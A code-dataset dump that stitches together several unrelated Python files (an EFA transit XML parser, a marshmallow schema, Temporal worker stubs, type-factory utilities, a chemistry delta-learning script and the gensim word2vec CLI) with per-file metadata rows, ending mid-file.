segment = ride[first:last]
segment.set_path(path)
return segment
def _parse_trip_interchange(self, data):
""" Parses an optional interchange path of a itdPartialRoute into a Way """
info = data.find('./itdFootPathInfo')
if info is None:
return None
way = Way()
way.duration = timedelta(minutes=int(info.attrib.get('duration')))
path = []
for coords in data.findall('./itdInterchangePathCoordinates/itdPathCoordinates'
'/itdCoordinateBaseElemList/itdCoordinateBaseElem'):
path.append(Coordinates(float(coords.find('y').text) / 1000000, float(coords.find('x').text) / 1000000))
if path:
way.path = path
events = []
for event in data.findall('./itdFootPathInfo/itdFootPathElem'):
name = event.attrib['type'].lower()
direction = event.attrib['level'].lower()
if name in ('elevator', 'escalator', 'stairs') and direction in ('up', 'down'):
events.append(WayEvent(name, direction))
way.events = events
return way
def _parse_datetime(self, data):
""" Create a datetime from itdDate and itdTime """
d = data.find('./itdDate').attrib
t = data.find('./itdTime').attrib
# -1 means nope, there is no time known
if d['weekday'] == '-1' or d['day'] == '-1' or t['minute'] == '-1':
return None
# convert time – the EFA API likes to talk about 24:00, so we have to correct that.
result = datetime(int(d['year']), int(d['month']), int(d['day']), min(int(t['hour']), 23), int(t['minute']))
if int(t['hour']) == 24:
result += timedelta(hours=1)
return result
def _parse_ride(self, data):
""" Parse a itdServingLine Node into something nicer """
line = Line()
meta = MetaRide(line=line)
ride = Ride(meta=meta)
if 'motType' not in data.attrib:
return None
# determine Type
mottype = int(data.attrib['motType'])
line.linetype = LineType(('train.local', 'urban', 'metro', 'urban', 'tram',
'bus.city', 'bus.regional', 'bus.express', 'suspended',
'ship', 'dialable', 'other')[mottype])
train = data.find('./itdTrain')
traintype = (train is not None and train.get('type')) or data.attrib.get('trainType')
if traintype is not None and traintype not in ('RE', 'RB'):
line.linetype = LineType('train.longdistance.highspeed' if traintype in ('ICE', 'THA', 'TGV')
else 'train.longdistance')
# general Line and Ride attributes
diva = data.find('./motDivaParams')
if diva is not None:
line.network = diva.attrib['network']
line.id = ':'.join((diva.attrib['network'], diva.attrib['line'], diva.attrib['supplement'],
diva.attrib['direction'], diva.attrib['project']))
ridedir = diva.attrib['direction'].strip()
if ridedir:
meta.direction = ridedir
meta.number = self._get_attrib(data, 'tC', 'key')
if line.id is not None and meta.number is not None:
meta.id = '%s:%s' % (line.id, meta.number)
op = data.find('./itdOperator')
if op is not None:
line.operator = op.find('./name').text
# We behave different for trains and non-trains
notrain = data.find('./itdNoTrain')
if mottype == 0:
line.name = data.attrib['symbol']
line.product = self._get_attrib(data, 'trainName', 'productName')
if not line.product:
line.product = notrain.attrib['name']
# overrides the diva one
meta.number = data.attrib.get('trainNum', meta.number)
prefix = data.attrib.get('trainType', '')
line.shortname = (prefix + meta.number) if prefix else line.name
if not line.shortname:
train = data.find('./itdTrain')
if train is not None:
line.shortname = train.attrib['type']
if not line.name:
line.name = line.shortname
else:
line.product = data.attrib.get('productName', '')
if not line.product:
line.product = data.find('./itdNoTrain').attrib['name']
if line.product == 'Fernbus':
line.linetype = LineType('bus.longdistance')
line.shortname = data.attrib['symbol']
line.name = ('%s %s' % (line.product, line.shortname)).strip()
ride.canceled = (notrain.attrib.get('delay', '') == '-9999') if notrain else None
# origin and destination
origin = data.attrib.get('directionFrom')
origin = Stop(full_name=origin) if origin else None
destination = self._get_attrib(data, 'destination', 'direction')
destination = Stop(full_name=destination) if destination else None
if data.attrib.get('destID', ''):
destination.country = self._parse_stopid_country(data.attrib['destID'])
destination.id = int(data.attrib['destID'])
# route description
routedescription = data.find('./itdRouteDescText')
if routedescription is not None:
line.route = routedescription.text
return ride, origin, destination
def _parse_ridepoint(self, data):
""" Parse a trip Point into a RidePoint (including the Location) """
city = self._get_attrib(data, 'locality', 'place')
name = self._get_attrib(data, 'nameWO')
full_name = self._get_attrib(data, 'name', 'stopName')
if data.attrib['area'] == '' and data.attrib['stopID'] == '0':
return None
location = Stop(country=self._parse_stopid_country(data.attrib['stopID']), city=city,
name=name, full_name=full_name)
location.id = int(data.attrib['stopID'])
# get and clean the platform
platform_id = data.attrib['platform'].strip()
name_platform = platform_id or data.get('platformName')
match = re.search(r'[0-9].*$', data.attrib['platformName'])
name_platform = match.group(0) if match is not None else name_platform
full_platform = data.attrib['platformName'].strip() or name_platform
if name_platform == full_platform and 'pointType' in data.attrib:
full_platform = '%s %s' % (data.attrib['pointType'], name_platform)
platform = Platform(stop=location, name=name_platform, full_name=full_platform)
if platform_id:
platform.id = ':'.join((str(location.id), data.attrib['area'], platform_id))
ifopt = data.attrib.get('gid', '').split(':')
if len(ifopt) == 3:
location.country = ifopt[0]
location.ifopt = ':'.join(ifopt)
ifopt = data.attrib.get('pointGid', '').split(':')
if len(ifopt) == 5 and str(location.id).endswith(ifopt[2]):
if location.ifopt is None:
location.country = ifopt[0]
location.ifopt = ':'.join(ifopt[:3])
if full_platform is not None:
platform.ifopt = ':'.join(ifopt)
if data.attrib.get('x'):
platform.lat = float(data.attrib['y']) / 1000000
platform.lon = float(data.attrib['x']) / 1000000
result = RidePoint(platform)
result.arrival, result.departure, result.passthrough = self._parse_ridepoint_time(data)
return result
def _parse_ridepoint_time(self, data):
# There are three ways to describe the time
if data.attrib.get('usage', ''):
# Used for routes (only arrival or departure time)
times = []
if data.find('./itdDateTimeTarget'):
times.append(self._parse_datetime(data.find('./itdDateTimeTarget')))
if data.find('./itdDateTime'):
times.append(self._parse_datetime(data.find('./itdDateTime')))
plantime = None
expected_time = None
if len(times) > 0:
plantime = times[0]
if len(times) == 2:
expected_time = times[1]
if data.attrib['usage'] == 'departure':
return None, LiveTime(time=plantime, expected_time=expected_time), None
elif data.attrib['usage'] == 'arrival':
return LiveTime(time=plantime, expected_time=expected_time), None, None
elif 'countdown' in data.attrib:
# Used for departure lists
times = []
if data.find('./itdDateTime'):
times.append(self._parse_datetime(data.find('./itdDateTime')))
if data.find('./itdRTDateTime'):
times.append(self._parse_datetime(data.find('./itdRTDateTime')))
plantime = expected_time = None
if len(times) > 0:
plantime = times[0]
if len(times) == 2:
expected_time = times[1]
return None, LiveTime(time=plantime, expected_time=expected_time), None
else:
# Also used for routes (arrival and departure time – most times)
times = []
for itddatetime in data.findall('./itdDateTime'):
times.append(self._parse_datetime(itddatetime))
passthrough = not [t for t in times if t is not None]
arrival = departure = None
if len(times) > 0 and times[0] is not None:
delay = int(data.attrib.get('arrDelay', '-1'))
delay = timedelta(minutes=delay) if delay >= 0 else None
arrival = LiveTime(time=times[0], delay=delay)
if len(times) > 1 and times[1] is not None:
delay = int(data.attrib.get('depDelay', '-1'))
delay = timedelta(minutes=delay) if delay >= 0 else None
departure = LiveTime(time=times[1], delay=delay)
return arrival, departure, passthrough
| 5,358 | 33,969 | 23 |
5cfd69f29b2d309d326593310d7963a46110542e | 837 | py | Python | ceraon/api/v1/locations/schema.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 1 | 2018-11-03T17:48:50.000Z | 2018-11-03T17:48:50.000Z | ceraon/api/v1/locations/schema.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 3 | 2021-03-09T09:47:04.000Z | 2022-02-12T13:04:41.000Z | ceraon/api/v1/locations/schema.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Location schema."""
from marshmallow import Schema, fields, validates
from werkzeug.exceptions import BadRequest
from ceraon.constants import Errors
class LocationSchema(Schema):
"""A schema for a Location model."""
created_at = fields.DateTime(dump_only=True)
name = fields.String(required=True, load_only=True)
id = fields.UUID()
address = fields.Str()
latitude = fields.Float()
longitude = fields.Float()
private_fields = ['address', 'latitude', 'longitude']
class Meta:
"""The mata class for the location schema."""
type_ = 'location'
strict = True
@validates('name')
def validate_name(self, value):
"""Validate the name of the location."""
if not value:
raise BadRequest(Errors.LOCATION_NAME_MISSING)
| 26.15625 | 58 | 0.655914 | # -*- coding: utf-8 -*-
"""Location schema."""
from marshmallow import Schema, fields, validates
from werkzeug.exceptions import BadRequest
from ceraon.constants import Errors
class LocationSchema(Schema):
"""A schema for a Location model."""
created_at = fields.DateTime(dump_only=True)
name = fields.String(required=True, load_only=True)
id = fields.UUID()
address = fields.Str()
latitude = fields.Float()
longitude = fields.Float()
private_fields = ['address', 'latitude', 'longitude']
class Meta:
"""The mata class for the location schema."""
type_ = 'location'
strict = True
@validates('name')
def validate_name(self, value):
"""Validate the name of the location."""
if not value:
raise BadRequest(Errors.LOCATION_NAME_MISSING)
| 0 | 0 | 0 |
a48761cda1ea411c2b818a7c48af1d5a1062fc80 | 24 | py | Python | distgen/_version.py | rsintheta/distgen | 5ee7c48a6261f65b3d1658bb66511b9ef1cd02cd | [
"Apache-2.0"
] | null | null | null | distgen/_version.py | rsintheta/distgen | 5ee7c48a6261f65b3d1658bb66511b9ef1cd02cd | [
"Apache-2.0"
] | null | null | null | distgen/_version.py | rsintheta/distgen | 5ee7c48a6261f65b3d1658bb66511b9ef1cd02cd | [
"Apache-2.0"
] | null | null | null |
__version__ = '0.4.4'
| 6 | 21 | 0.583333 |
__version__ = '0.4.4'
| 0 | 0 | 0 |
a1b004e47c4537ad22d3c3e3ead762da0229a0e5 | 1,101 | py | Python | src/workflows/worker.py | turnbros/paul | 42699b4d13386b39f60a4aacede64dc4d1415ea6 | [
"CC-BY-4.0"
] | null | null | null | src/workflows/worker.py | turnbros/paul | 42699b4d13386b39f60a4aacede64dc4d1415ea6 | [
"CC-BY-4.0"
] | null | null | null | src/workflows/worker.py | turnbros/paul | 42699b4d13386b39f60a4aacede64dc4d1415ea6 | [
"CC-BY-4.0"
] | 1 | 2022-01-10T19:51:38.000Z | 2022-01-10T19:51:38.000Z | import logging
from util import config
from abc import ABC, abstractmethod
from temporal.workflow import workflow_method
logging.basicConfig(level=logging.DEBUG)
import functools
| 19.315789 | 57 | 0.786558 | import logging
from util import config
from abc import ABC, abstractmethod
from temporal.workflow import workflow_method
logging.basicConfig(level=logging.DEBUG)
import functools
def example_workflow_method(queue_name):
def decorator_repeat(func):
@functools.wraps(func)
def wrapper_example_workflow_method(*args, **kwargs):
print(queue_name)
return wrapper_example_workflow_method
return decorator_repeat
class TemporalWorker(ABC):
@property
def paul_config(self):
return config.Configuration()
@property
def temporal_config(self):
return self.paul_config.read_temporal_config()
@property
def worker_config(self):
return self.paul_config.read_workflow_config(self.name)
@property
@abstractmethod
def name(self):
raise NotImplementedError
@abstractmethod
async def worker_workflow(self, payload: dict):
raise NotImplementedError
async def execute(self, payload: dict):
@workflow_method(task_queue=self.name)
async def execute_workflow(self, payload: dict):
return self.worker_workflow(payload)
return execute_workflow(payload)
| 631 | 227 | 45 |
4622d9b42469a4b6e217b79ba18cfcdbef274db4 | 4,955 | py | Python | ycyc/base/typeutils.py | MrLYC/ycyc | 1938493294fbad3a461cc3a752c5385d30a6e51d | [
"MIT"
] | 22 | 2015-07-21T03:15:36.000Z | 2021-02-23T07:58:03.000Z | ycyc/base/typeutils.py | MrLYC/ycyc | 1938493294fbad3a461cc3a752c5385d30a6e51d | [
"MIT"
] | 3 | 2016-03-20T12:06:07.000Z | 2018-01-16T10:34:19.000Z | ycyc/base/typeutils.py | MrLYC/ycyc | 1938493294fbad3a461cc3a752c5385d30a6e51d | [
"MIT"
] | 3 | 2015-05-08T00:55:38.000Z | 2017-02-25T03:30:14.000Z | #!/usr/bin/env python
# encoding: utf-8
from itertools import groupby
from operator import itemgetter
def get_real_bases(bases):
"""
Get real bases for types argument.
>>> get_real_bases(None) #=> (object,)
>>> get_real_bases(TypeA) #=> (TypeA,)
>>> get_real_bases([TypeA, TypeB]) #=> (TypeA, TypeB)
:param bases: type or type sequence
"""
if bases is None:
return (object,)
if isinstance(bases, type):
bases = (bases,)
return tuple(bases)
def subtype(name, bases=None, attrs=None):
"""
A easier way to create a type inherited from bases(default:object)
with specified attrs.
:param name: name of new type
:param bases: bases class of new type
:param attrs: class attributes of new type
"""
return type(name, get_real_bases(bases), dict(attrs or {}))
class TypeFactory(object):
"""
Create your type from this factory.
>>> types_factory.NewType()
equals:
>>> subtype("NewType")
"""
types_factory = TypeFactory()
def subexception(name, bases=None, attrs=None):
"""
A easier way to create an Exception
:param name: name of new exception
:param bases: bases class of new exception
:param attrs: class attributes of new exception
"""
return subtype(name, bases or [Exception], attrs)
class ExceptionFactory(object):
"""
Create your type by this factory.
>>> exceptions_factory.NewError()
equals:
>>> subexception("NewError")
"""
exceptions_factory = ExceptionFactory()
class SimpleExceptions(object):
"""
Create and cached a simple exception.
"""
def freezed_attrs(attrs):
"""
Decorator the declare attributes of cls is freezed.
Attributes in attrs can only assigned once as
initialization(usually is in __init__).
:param attrs: attribute list
"""
return setattr_hook
class Constants(object):
"""
The base class of constants
"""
def constants(**kwg):
"""
Declare some constants.
"""
return Constants(kwg, {"name": "ConstantSet"})
def enums(*values):
"""
Declare some enumerations.
"""
return Constants(
{k: i for i, k in enumerate(values)},
{"name": "EnumerationSet", "getitem_hook": _enums_getitem_hook}
)
| 25.152284 | 75 | 0.587891 | #!/usr/bin/env python
# encoding: utf-8
from itertools import groupby
from operator import itemgetter
def get_real_bases(bases):
"""
Get real bases for types argument.
>>> get_real_bases(None) #=> (object,)
>>> get_real_bases(TypeA) #=> (TypeA,)
>>> get_real_bases([TypeA, TypeB]) #=> (TypeA, TypeB)
:param bases: type or type sequence
"""
if bases is None:
return (object,)
if isinstance(bases, type):
bases = (bases,)
return tuple(bases)
def subtype(name, bases=None, attrs=None):
"""
A easier way to create a type inherited from bases(default:object)
with specified attrs.
:param name: name of new type
:param bases: bases class of new type
:param attrs: class attributes of new type
"""
return type(name, get_real_bases(bases), dict(attrs or {}))
class TypeFactory(object):
"""
Create your type from this factory.
>>> types_factory.NewType()
equals:
>>> subtype("NewType")
"""
def __getattr__(self, name):
return lambda bases=None, attrs=None: subtype(
name, bases, attrs,
)
types_factory = TypeFactory()
def subexception(name, bases=None, attrs=None):
"""
A easier way to create an Exception
:param name: name of new exception
:param bases: bases class of new exception
:param attrs: class attributes of new exception
"""
return subtype(name, bases or [Exception], attrs)
class ExceptionFactory(object):
"""
Create your type by this factory.
>>> exceptions_factory.NewError()
equals:
>>> subexception("NewError")
"""
def __getattr__(self, name):
return lambda bases=None, attrs=None: subexception(
name, bases, attrs,
)
exceptions_factory = ExceptionFactory()
class SimpleExceptions(object):
"""
Create and cached a simple exception.
"""
def __getattr__(self, name):
exception = subexception(name)
setattr(self, name, exception)
return exception
def freezed_attrs(attrs):
"""
Decorator the declare attributes of cls is freezed.
Attributes in attrs can only assigned once as
initialization(usually is in __init__).
:param attrs: attribute list
"""
def setattr_hook(cls):
def __setattr__(self, name, val):
if name not in attrs or hasattr(self, name):
raise AttributeError("attribute %s is not writable" % name)
return super(cls, self).__setattr__(name, val)
return subtype(
cls.__name__, cls,
{
"__doc__": cls.__doc__,
"__setattr__": __setattr__,
}
)
return setattr_hook
class Constants(object):
"""
The base class of constants
"""
def __new__(cls, mappings, attrs):
consts_index = {
val: tuple(i[0] for i in item)
for val, item in groupby(list(mappings.items()), itemgetter(1))
}
__name__ = attrs.pop("name", cls.__name__)
def __iter__(self):
return iter(mappings.items())
hook = attrs.pop("iter_hook", None)
if hook:
__iter__ = hook(__iter__)
def __getitem__(self, val):
return consts_index.get(val)
hook = attrs.pop("getitem_hook", None)
if hook:
__getitem__ = hook(__getitem__)
def __len__(self):
return len(mappings)
hook = attrs.pop("len_hook", None)
if hook:
__len__ = hook(__len__)
def __setattr__(self, name, val):
if name not in mappings or hasattr(self, name):
raise AttributeError("attribute %s is not writable" % name)
return super(cls, self).__setattr__(name, val)
hook = attrs.pop("setattr_hook", None)
if hook:
__setattr__ = hook(__setattr__)
constants = super(Constants, cls).__new__(subtype(
__name__, cls,
{
"__doc__": cls.__doc__,
"__iter__": __iter__,
"__getitem__": __getitem__,
"__len__": __len__,
"__setattr__": __setattr__,
}
))
return constants
def __init__(self, mappings, attrs):
for k, v in list(mappings.items()):
setattr(self, k, v)
def __getitem__(self, name):
pass
def __len__(self):
pass
def __iter__(self):
pass
def constants(**kwg):
"""
Declare some constants.
"""
return Constants(kwg, {"name": "ConstantSet"})
def _enums_getitem_hook(method):
def getitem(self, name):
return method(self, name)[0]
return getitem
def enums(*values):
"""
Declare some enumerations.
"""
return Constants(
{k: i for i, k in enumerate(values)},
{"name": "EnumerationSet", "getitem_hook": _enums_getitem_hook}
)
| 2,396 | 0 | 261 |
71de2eae5aee65bc132d29967be856043a214997 | 6,807 | py | Python | notebook/script/MachineLearning.py | licheng-xu-echo/SyntheticSpacePrediction | 986b6d010b10c825121452880aecf8e195793a13 | [
"MIT"
] | null | null | null | notebook/script/MachineLearning.py | licheng-xu-echo/SyntheticSpacePrediction | 986b6d010b10c825121452880aecf8e195793a13 | [
"MIT"
] | null | null | null | notebook/script/MachineLearning.py | licheng-xu-echo/SyntheticSpacePrediction | 986b6d010b10c825121452880aecf8e195793a13 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 25 21:00:31 2022
@author: LiCheng_Xu
"""
import numpy as np
from .TargetTransformation import ddG2ee
import matplotlib.pyplot as plt
from scipy.interpolate import make_interp_spline
from sklearn.model_selection import KFold
| 41.506098 | 117 | 0.58763 | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 25 21:00:31 2022
@author: LiCheng_Xu
"""
import numpy as np
from .TargetTransformation import ddG2ee
import matplotlib.pyplot as plt
from scipy.interpolate import make_interp_spline
from sklearn.model_selection import KFold
def std_error(truth,pred):
return np.sqrt(np.sum((truth - pred)**2)/(len(truth)-1))
def genCountMap(_smi_set,synthetic_space,point_pred_map,point_error_map,species='TDG'):
pred_space_ee = []
pred_space_ddG = []
pred_space_error = []
for i in range(len(point_pred_map)):
pred_ddG = point_pred_map[i]
pred_error = point_error_map[i]
pred_ee = ddG2ee(pred_ddG,60+273.15)
pred_space_ddG.append(pred_ddG)
pred_space_ee.append(pred_ee)
pred_space_error.append(pred_error)
_count_map = {}
_up_count_map = {}
_down_count_map = {}
for _smi in _smi_set:
_count_map[_smi] = {0.1:0,0.2:0,0.3:0,0.4:0,0.5:0,
0.6:0,0.7:0,0.8:0,0.9:0,1:0}
_up_count_map[_smi] = {0.1:0,0.2:0,0.3:0,0.4:0,0.5:0,
0.6:0,0.7:0,0.8:0,0.9:0,1:0}
_down_count_map[_smi] = {0.1:0,0.2:0,0.3:0,0.4:0,0.5:0,
0.6:0,0.7:0,0.8:0,0.9:0,1:0}
for i in range(len(synthetic_space)):
_smi = synthetic_space.iloc[i][species]
tmp_ee = pred_space_ee[i]
tmp_ddG = pred_space_ddG[i]
tmp_error = pred_space_error[i]
tmp_ee_up = ddG2ee(tmp_ddG+tmp_error,60+273.15)
tmp_ee_down = ddG2ee(tmp_ddG-tmp_error,60+273.15)
for th in _count_map[_smi]:
if tmp_ee < th:
_count_map[_smi][th] += 1
break
for th in _up_count_map[_smi]:
if tmp_ee_up < th:
_up_count_map[_smi][th] += 1
break
for th in _down_count_map[_smi]:
if tmp_ee_down < th:
_down_count_map[_smi][th] += 1
break
_ave_count_map = {}
for smi in _count_map:
_ave_count_map[smi] = {}
for key in _count_map[smi]:
ave = int((_count_map[smi][key] + _up_count_map[smi][key] + _down_count_map[smi][key])/3)
_ave_count_map[smi][key] = ave
return _count_map,_up_count_map,_down_count_map,_ave_count_map
def vis_distribution(ave_count_map,sel_smi_color_map,title=''):
plt.figure(figsize=(14,5))
x = np.array([10,20,30,40,50,60,70,80,90,100])
x_smooth = np.linspace(x.min(), x.max(), 100)
for smi in sel_smi_color_map:
y_ave = np.array([ave_count_map[smi][key] for key in [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1]])
y_ave_smooth = make_interp_spline(x,y_ave)(x_smooth)
y_ave_smooth = np.where(y_ave_smooth>0,y_ave_smooth,0)
plt.plot(x_smooth, y_ave_smooth,c=sel_smi_color_map[smi],alpha=0.9)
plt.fill_between(x_smooth,y_ave_smooth,np.zeros(len(y_ave_smooth)),color=sel_smi_color_map[smi],alpha=0.1)
plt.xticks([10,20,30,40,50,60,70,80,90,100],['<10','10-20','20-30','30-40','40-50',
'50-60','60-70','70-80','80-90','>90'],fontsize=14)
plt.yticks([0,10000,20000,30000,40000],['0','10000','20000','30000','40000'],fontsize=14)
plt.xlabel('ee (%)',fontsize=16)
plt.ylabel('Count',fontsize=16)
plt.tick_params(bottom='on',left='on')
plt.title(title,fontsize=16)
plt.tight_layout()
plt.show()
def DeltaLearningPrediction(base_x,rest_x,space_x,base_y,rest_y,base_model,specific_model,base_model_only_point_idx,
selidx2idxs_map,k_fold_num,random_seed=2022):
val_p = []
val_Y = []
kfold = KFold(n_splits=k_fold_num,shuffle=True,random_state=random_seed)
for fit_idx,val_idx in kfold.split(base_x):
fit_x,fit_y = base_x[fit_idx],base_y[fit_idx]
val_x,val_y = base_x[val_idx],base_y[val_idx]
base_model.fit(fit_x,fit_y)
val_p.append(base_model.predict(val_x))
val_Y.append(val_y)
val_p = np.concatenate(val_p)
val_y = np.concatenate(val_Y)
base_error = std_error(val_y,val_p)
point_error_map = {idx:base_error for idx in base_model_only_point_idx} ## 给出空间每个点的预测误差,以此作为置信度
base_model.fit(base_x,base_y)
points_x = space_x[base_model_only_point_idx]
points_p = base_model.predict(points_x)
point_pred_map = {idx:points_p[i] for i,idx in enumerate(base_model_only_point_idx)} ## Check
for j,selidx in enumerate(selidx2idxs_map):
idxs = selidx2idxs_map[selidx]
sel_x = rest_x[list(selidx)]
sel_y = rest_y[list(selidx)]
val_p = []
val_Y = []
if len(sel_x) > k_fold_num:
for fit_idx,val_idx in kfold.split(sel_x):
fit_x,fit_y = sel_x[fit_idx],sel_y[fit_idx]
val_x,val_y = sel_x[val_idx],sel_y[val_idx]
fit_p = base_model.predict(fit_x)
fit_d = fit_y - fit_p
specific_model.fit(fit_x,fit_d)
val_p.append(base_model.predict(val_x)+specific_model.predict(val_x))
val_Y.append(val_y)
val_p = np.concatenate(val_p)
val_y = np.concatenate(val_Y)
error = std_error(val_y,val_p)
if error > base_error:
for idx in idxs:
point_error_map[idx] = base_error
points_x = space_x[idxs]
points_p = base_model.predict(points_x)
for i,idx in enumerate(idxs):
point_pred_map[idx] = points_p[i]
else:
for idx in idxs:
point_error_map[idx] = error
sel_p = base_model.predict(sel_x)
sel_d = sel_y - sel_p
specific_model.fit(sel_x,sel_d)
points_x = space_x[idxs]
points_p = base_model.predict(points_x) + specific_model.predict(points_x)
for i,idx in enumerate(idxs):
point_pred_map[idx] = points_p[i]
else:
points_x = space_x[idxs]
points_p = base_model.predict(points_x)
for i,idx in enumerate(idxs):
point_pred_map[idx] = points_p[i]
point_error_map[idx] = base_error
sorted_point_error_map = {}
for i in range(len(point_error_map)):
sorted_point_error_map[i] = point_error_map[i]
sorted_point_pred_map = {}
for i in range(len(point_pred_map)):
sorted_point_pred_map[i] = point_pred_map[i]
return sorted_point_pred_map,sorted_point_error_map
| 6,434 | 0 | 124 |
c8521555850f9bc486cf9f8cc0ba3ef9390b66ee | 875 | py | Python | my_lambdata/postISA.py | SaraWestWA/lambdata-iambrookedrake | a599cec77cdeb37b3465adc6d0d3e5e92b050ad6 | [
"MIT"
] | null | null | null | my_lambdata/postISA.py | SaraWestWA/lambdata-iambrookedrake | a599cec77cdeb37b3465adc6d0d3e5e92b050ad6 | [
"MIT"
] | 1 | 2021-08-23T20:57:33.000Z | 2021-08-23T20:57:33.000Z | my_lambdata/postISA.py | SaraWestWA/lambdata-iambrookedrake | a599cec77cdeb37b3465adc6d0d3e5e92b050ad6 | [
"MIT"
] | 2 | 2020-07-13T01:26:47.000Z | 2020-09-15T03:29:08.000Z | import pandas as pd
# Accepts input for 'Salary Offer' and 'Tax Rate %' to provide
# Annual, Monthly, and Weekly take home pay after taxes and
# Lambda ISA deductions
if __name__ == '__main__':
salary = int(input("Salary Offer $:"))
taxrate = int(input('Tax Rate as Whole Number ___%:'))
take_home = TakeHomePay(salary, taxrate).postISA(salary, taxrate)
print("After ISA and Taxes, Take Home Pay is:", round(take_home, 2),
"Annually/// ", round(take_home/12, 2), "Monthly///",
round(take_home/52, 2), "Weekly")
| 35 | 72 | 0.637714 | import pandas as pd
class TakeHomePay():
# Accepts input for 'Salary Offer' and 'Tax Rate %' to provide
# Annual, Monthly, and Weekly take home pay after taxes and
# Lambda ISA deductions
def __init__(self, salary, taxrate):
self.salary = salary
self.taxrate = taxrate
def postISA(self, salary, taxrate):
ISArate = 17 # Whole number % of ISA rate
take_home = self.salary * (1-self.taxrate/100) * (1-ISArate/100)
return take_home
if __name__ == '__main__':
salary = int(input("Salary Offer $:"))
taxrate = int(input('Tax Rate as Whole Number ___%:'))
take_home = TakeHomePay(salary, taxrate).postISA(salary, taxrate)
print("After ISA and Taxes, Take Home Pay is:", round(take_home, 2),
"Annually/// ", round(take_home/12, 2), "Monthly///",
round(take_home/52, 2), "Weekly")
| 238 | -1 | 77 |
22be887cd1f296eff9257ff04bb6e26cac5510dd | 5,976 | py | Python | Job Portal with Automated Resume Screening/gensim-4.1.2/gensim/scripts/word2vec_standalone.py | Candida18/Job-Portal-with-Automated-Resume-Screening | 19d19464ad3d1714da856656753a4afdfe257b31 | [
"MIT"
] | 3 | 2021-03-29T19:21:08.000Z | 2021-12-31T09:30:11.000Z | Job Portal with Automated Resume Screening/gensim-4.1.2/gensim/scripts/word2vec_standalone.py | Candida18/Job-Portal-with-Automated-Resume-Screening | 19d19464ad3d1714da856656753a4afdfe257b31 | [
"MIT"
] | 1 | 2021-08-30T08:53:09.000Z | 2021-08-30T08:53:09.000Z | venv/Lib/site-packages/gensim/scripts/word2vec_standalone.py | saritmaitra/nlp_ner_topic_modeling | 70914b4ae4cd7d3b9cb10776161132216394883c | [
"MIT"
] | 2 | 2022-01-15T05:36:58.000Z | 2022-02-08T15:25:50.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s -train CORPUS -output VECTORS -size SIZE -window WINDOW
-cbow CBOW -sample SAMPLE -hs HS -negative NEGATIVE -threads THREADS -iter ITER
-min_count MIN-COUNT -alpha ALPHA -binary BINARY -accuracy FILE
Trains a neural embedding model on text file CORPUS.
Parameters essentially reproduce those used by the original C tool
(see https://code.google.com/archive/p/word2vec/).
Parameters for training:
-train <file>
Use text data from <file> to train the model
-output <file>
Use <file> to save the resulting word vectors / word clusters
-size <int>
Set size of word vectors; default is 100
-window <int>
Set max skip length between words; default is 5
-sample <float>
Set threshold for occurrence of words. Those that appear with higher frequency in the training data
will be randomly down-sampled; default is 1e-3, useful range is (0, 1e-5)
-hs <int>
Use Hierarchical Softmax; default is 0 (not used)
-negative <int>
Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)
-threads <int>
Use <int> threads (default 3)
-iter <int>
Run more training iterations (default 5)
-min_count <int>
This will discard words that appear less than <int> times; default is 5
-alpha <float>
Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW
-binary <int>
Save the resulting vectors in binary moded; default is 0 (off)
-cbow <int>
Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)
-accuracy <file>
Compute accuracy of the resulting model analogical inference power on questions file <file>
See an example of questions file
at https://code.google.com/p/word2vec/source/browse/trunk/questions-words.txt
Example: python -m gensim.scripts.word2vec_standalone -train data.txt \
-output vec.txt -size 200 -sample 1e-4 -binary 0 -iter 3
"""
import logging
import os.path
import sys
import argparse
from numpy import seterr
from gensim.models.word2vec import Word2Vec, LineSentence # avoid referencing __main__ in pickle
logger = logging.getLogger(__name__)
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s', level=logging.INFO)
logger.info("running %s", " ".join(sys.argv))
seterr(all='raise') # don't ignore numpy errors
parser = argparse.ArgumentParser()
parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
parser.add_argument(
"-sample",
help="Set threshold for occurrence of words. "
"Those that appear with higher frequency in the training data will be randomly down-sampled; "
"default is 1e-3, useful range is (0, 1e-5)",
type=float, default=1e-3)
parser.add_argument(
"-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument(
"-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
type=int, default=5
)
parser.add_argument("-threads", help="Use THREADS threads (default 3)", type=int, default=3)
parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
parser.add_argument(
"-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
type=int, default=5
)
parser.add_argument(
"-alpha", help="Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW",
type=float
)
parser.add_argument(
"-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
type=int, default=1, choices=[0, 1]
)
parser.add_argument(
"-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")
args = parser.parse_args()
if args.cbow == 0:
skipgram = 1
if not args.alpha:
args.alpha = 0.025
else:
skipgram = 0
if not args.alpha:
args.alpha = 0.05
corpus = LineSentence(args.train)
model = Word2Vec(
corpus, vector_size=args.size, min_count=args.min_count, workers=args.threads,
